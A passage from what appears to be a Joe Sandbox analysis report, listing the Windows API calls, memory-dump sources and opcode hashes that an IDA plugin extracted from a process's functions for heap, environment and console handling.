                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D152EE64
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D152EE78
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2759988882-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1606018815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ConsoleTitle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: -
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3358957663-3695764949
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c360db95d29a2a970590f15769e2f1838fb5789d035dd07cb8545eaec306f515
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87317C22A0864B82FB05BB11A85407CFAA4BF49B90FD94136D90F477B6DFBCE491C764
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpswscanf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: :EOF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1534968528-551370653
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 06d588baf97c95816b9c3c9e0cb62b0109f1a301a2bf34a38e374ceb7c50fda5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6318232A18A4B86FB54BB15E4502BDF2A0EF65B50FD44173EA4F462B1DFBCE841C660
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: 3$3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 0-2538865259
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 122d892b21f573a8c6b488a48e8ba572b5eb6560838035a42d71521a0751c07d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62011231D2E68B8AF716BB60E8A42BCB670BB51321FD50537E41B015B1CFECA484C670
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D15206F0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D152074D
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D151B4DB), ref: 00007FF7D1520762
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction ID: 112ff40a95d34841388b31947e1cf72a93c39629705f3855c594b603780d5e84
• Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
• Instruction Fuzzy Hash: BD416D72A1A64B86FB54AF50E45427EB7A0EB45B40BD88136DA4F43760DFBCE444CB60